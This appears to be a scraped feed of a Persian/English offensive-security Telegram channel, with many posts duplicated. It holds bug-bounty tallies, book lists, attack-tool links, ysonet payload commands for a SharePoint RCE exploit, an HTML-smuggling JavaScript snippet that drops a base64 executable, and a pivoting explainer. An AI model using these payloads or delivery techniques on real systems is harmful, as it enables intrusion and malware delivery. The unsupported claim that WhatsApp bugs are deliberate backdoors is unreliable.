📊 Watcher Summary Report
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 68 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 68 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
❤2⚡1👍1
📊 Watcher Summary Report
🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
🔹 BUGCROWD: 3 new items
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐ @ZeroSec_team
❤1👍1
Red_Team_How_to_Succeed_by_Thinking_Like_the_Enemy_by_Micah_Zenko.pdf
4 MB
Red Team: How to Succeed By Thinking Like the Enemy — by Micah Zenko
بخونید تا رستگار شوید
#Book #RedTeam #ZeroSec
⭐ @ZeroSec_team
بخونید تا رستگار شوید
#Book #RedTeam #ZeroSec
⭐ @ZeroSec_team
❤2👍1
این اولین بار نیست! آسیبپذیریهای مشابه هر سال از 2017 تا الان گزارش شده:
RCE از طریق تماس تصویری (2019)
اجرای کد با فایل ویدیو (2020)
جاسوسافزار Pegasus روی واتساپ!
احتمال خیلی زیاد تمام این باگ ها تعمدی و backdoor هستند
#امنیت #Whatsapp #Backdoor #Hack
⭐ @ZeroSec_team
RCE از طریق تماس تصویری (2019)
اجرای کد با فایل ویدیو (2020)
جاسوسافزار Pegasus روی واتساپ!
احتمال خیلی زیاد تمام این باگ ها تعمدی و backdoor هستند
#امنیت #Whatsapp #Backdoor #Hack
⭐ @ZeroSec_team
❤4😱1
#tools
#Red_Team_Tactics
Extending AD CS attack surface to the cloud with Intune certificates
https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs
// Hybrid certificate attack paths:
scenarios, recommendations for exploitation and elimination of vulnerabilities
Related tools:
]-> SCEP request tool for AD CS NDES and Intune
]-> Tool for AD Certificate Services enum/abuse
]-> Tools for Kerberos PKINIT and relaying to AD CS
@Zerosec_team
#Red_Team_Tactics
Extending AD CS attack surface to the cloud with Intune certificates
https://dirkjanm.io/extending-ad-cs-attack-surface-intune-certs
// Hybrid certificate attack paths:
scenarios, recommendations for exploitation and elimination of vulnerabilities
Related tools:
]-> SCEP request tool for AD CS NDES and Intune
]-> Tool for AD Certificate Services enum/abuse
]-> Tools for Kerberos PKINIT and relaying to AD CS
@Zerosec_team
dirkjanm.io
Extending AD CS attack surface to the cloud with Intune certificates
Active Directory Certificate Services (AD CS) attack surface is pretty well explored in Active Directory itself, with *checks notes* already 16 “ESC” attacks being publicly described. Hybrid certificate attack paths have not gained that much attention yet…
❤3👍1
📊 Watcher Summary Report
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 11 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 11 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❌ BullShit Books :
1. Bug Bounty Bootcamp – Vickie Li
2. Web Hacking 101 – Peter Yaworski
3. Real-World Bug Hunting – Peter Yaworski
4. The Basics of Hacking and Penetration Testing – Patrick Engebretson
5. Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman
6. Hacking Web Apps – Mike Shema
7. The Hacker Playbook 1 – Peter Kim
8. Gray Hat Hacking
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #BullshitBooks #CTF #EthicalHacking #HackTip
⭐️ @ZeroSec_team
1. Bug Bounty Bootcamp – Vickie Li
2. Web Hacking 101 – Peter Yaworski
3. Real-World Bug Hunting – Peter Yaworski
4. The Basics of Hacking and Penetration Testing – Patrick Engebretson
5. Penetration Testing: A Hands-On Introduction to Hacking – Georgia Weidman
6. Hacking Web Apps – Mike Shema
7. The Hacker Playbook 1 – Peter Kim
8. Gray Hat Hacking
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #BullshitBooks #CTF #EthicalHacking #HackTip
⭐️ @ZeroSec_team
👏5👎1
✅ Nice Books :
1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto
2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)
3. Hacking: The Art of Exploitation – Jon Erickson
4. Advanced Web Attacks and Exploitation – Dafydd Stuttard
5. Web Security for Developers – Malcolm McDonald
6. Real-World Web Application Security – Andrew Hoffman
7. Bug Bounty Hunting Essentials – Carlos A. Lozano
8. Black Hat Python – Justin Seitz
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking
⭐️ @ZeroSec_team
1. The Web Application Hacker's Handbook –Dafydd Stuttard & Marcus Pinto
2. The Hacker Playbook 2 & 3 – Peter Kim (not recommended)
3. Hacking: The Art of Exploitation – Jon Erickson
4. Advanced Web Attacks and Exploitation – Dafydd Stuttard
5. Web Security for Developers – Malcolm McDonald
6. Real-World Web Application Security – Andrew Hoffman
7. Bug Bounty Hunting Essentials – Carlos A. Lozano
8. Black Hat Python – Justin Seitz
#BugBounty #InfoSec #CyberSecurity #WebSecurity #HackThePlanet #RedTeam #Pentesting #EthicalHacking #Exploitation #AdvancedHacking
⭐️ @ZeroSec_team
👍3❤1
DE&TH_Guide_1_3.pdf
2 MB
#DFIR
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.
⭐️ @ZeroSec_team
#Whitepaper
#Blue_Team_Techniques
"Detection Engineering & Threat Hunting (DE&TH) Guide", ver.1.3, Aug. 2025.
⭐️ @ZeroSec_team
❤1🙏1
#rce #pentest #redteam #ad #sharepoint #cve
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
Patched: July 20, 2025
⭐️ @ZeroSec_team
CVE-2025-53770: SharePoint RCE (ToolShell)
Exploit: https://github.com/soltanali0/CVE-2025-53770-Exploit
Upd: https://github.com/irsdl/ysonet
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 1 -c "calc"
ysonet.exe -p sharepoint --cve=CVE-2025-49704 -var 2 -c "C:\\temp\\ExploitClass.cs;System.dll"
Patched: July 20, 2025
⭐️ @ZeroSec_team
GitHub
GitHub - soltanali0/CVE-2025-53770-Exploit: SharePoint WebPart Injection Exploit Tool
SharePoint WebPart Injection Exploit Tool. Contribute to soltanali0/CVE-2025-53770-Exploit development by creating an account on GitHub.
❤4
HTML Smuggling چیه و چرا خطرناکه؟
یه تکنیک خفن تو حملات سایبریه که هکر باهاش میتونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!
یعنی چی؟ یعنی بهجای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML میفرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا میشه و فایل رو از صفر میسازه و به قربانی میده!
مثال:
یه فایل اجرایی که:
نه از نت دانلود شده
نه توی ترافیک دیده میشه
نه فایروال جلوش رو میگیره
و نه حتی آنتیویروس متوجه میشه!
این یکی از روشهای محبوب برای Initial Access هست.
#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess
⭐️ @ZeroSec_team
یه تکنیک خفن تو حملات سایبریه که هکر باهاش میتونه بدافزار رو بدون دانلود از سرور خودش، داخل مرورگر قربانی تولید کنه!
یعنی چی؟ یعنی بهجای اینکه فایل مخرب مثل malware.exe رو مستقیم به قربانی بده، یه فایل HTML میفرسته که توش یه کد جاوااسکریپت هست. این کد تو مرورگر اجرا میشه و فایل رو از صفر میسازه و به قربانی میده!
مثال:
let file = atob("TVqQAAMAAAAEAAAA...");
let blob = new Blob([Uint8Array.from(file, c => c.charCodeAt(0))]);
let url = URL.createObjectURL(blob);
window.open(url); // یا auto downloadیه فایل اجرایی که:
نه از نت دانلود شده
نه توی ترافیک دیده میشه
نه فایروال جلوش رو میگیره
و نه حتی آنتیویروس متوجه میشه!
این یکی از روشهای محبوب برای Initial Access هست.
#HTML_Smuggling #RedTeam #CyberSecurity #Phishing #InitialAccess
⭐️ @ZeroSec_team
❤5👍2
«سلام به دنیای جدید امنیت با ظهور هوش مصنوعی»
دنیای آیندهی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:
۱. استفاده از AI بهعنوان ابزاری فوقپیشرفته
۲. بهرهگیری از خطاهای انسانی بهعنوان راه ورود
#XBOW #HackerOne #AI #CyberSecurity #RedTeam
⭐️ @ZeroSec_team
دنیای آیندهی امنیت، با ظهور هوش مصنوعی بر دو پایه استواره:
۱. استفاده از AI بهعنوان ابزاری فوقپیشرفته
۲. بهرهگیری از خطاهای انسانی بهعنوان راه ورود
#XBOW #HackerOne #AI #CyberSecurity #RedTeam
⭐️ @ZeroSec_team
❤1🔥1😱1
📊 Watcher Summary Report
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 51 new items
🔹 INTIGRITI: 3 new items
🔹 YESWEHACK: 8 new items
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 51 new items
🔹 INTIGRITI: 3 new items
🔹 YESWEHACK: 8 new items
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤2
Pivoting: تسلط مرحله به مرحله بر شبکههای داخلی
Pivoting یک تکنیک حیاتی در مرحلهی Post-Exploitation و بخش مرکزی Lateral Movement محسوب میشود.
Pivoting یعنی استفاده از host تسخیر شده به عنوان نقطه عبور (bridge node) برای رسیدن به subnetهایی که از شبکهی مهاجم (attacker C2) بهطور مستقیم قابل دسترسی نیستند (non-routable/internal segments)
سناریوی رایج:
Exploit → Initial Access به DMZ
Recon: شناسایی internal segments (مثلاً با ARP scan یا route enumeration)
Pivot Setup: ایجاد مسیر ارتباطی
حرکت به سمت اهداف high-value مثل Domain Controllers، فایلسرورها یا اپهای مدیریتی داخلی
قبل از هر pivot باید route ها، firewall rule ها و ACL ها بررسی شوند. بدون visibility دقیق، هر گونه ترافیک غیرعادی میتواند باعث شناسایی عملیات شود.
#RedTeamOps #Pivoting #NetworkSegmentationBypass #AdvancedPostExploitation
⭐️ @ZeroSec_team
Pivoting یک تکنیک حیاتی در مرحلهی Post-Exploitation و بخش مرکزی Lateral Movement محسوب میشود.
Pivoting یعنی استفاده از host تسخیر شده به عنوان نقطه عبور (bridge node) برای رسیدن به subnetهایی که از شبکهی مهاجم (attacker C2) بهطور مستقیم قابل دسترسی نیستند (non-routable/internal segments)
سناریوی رایج:
Exploit → Initial Access به DMZ
Recon: شناسایی internal segments (مثلاً با ARP scan یا route enumeration)
Pivot Setup: ایجاد مسیر ارتباطی
حرکت به سمت اهداف high-value مثل Domain Controllers، فایلسرورها یا اپهای مدیریتی داخلی
قبل از هر pivot باید route ها، firewall rule ها و ACL ها بررسی شوند. بدون visibility دقیق، هر گونه ترافیک غیرعادی میتواند باعث شناسایی عملیات شود.
#RedTeamOps #Pivoting #NetworkSegmentationBypass #AdvancedPostExploitation
⭐️ @ZeroSec_team
❤1👍1👎1🔥1
📊 Watcher Summary Report
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 33 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 15 new items
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 33 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤1👍1🎉1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤3
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 1 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤4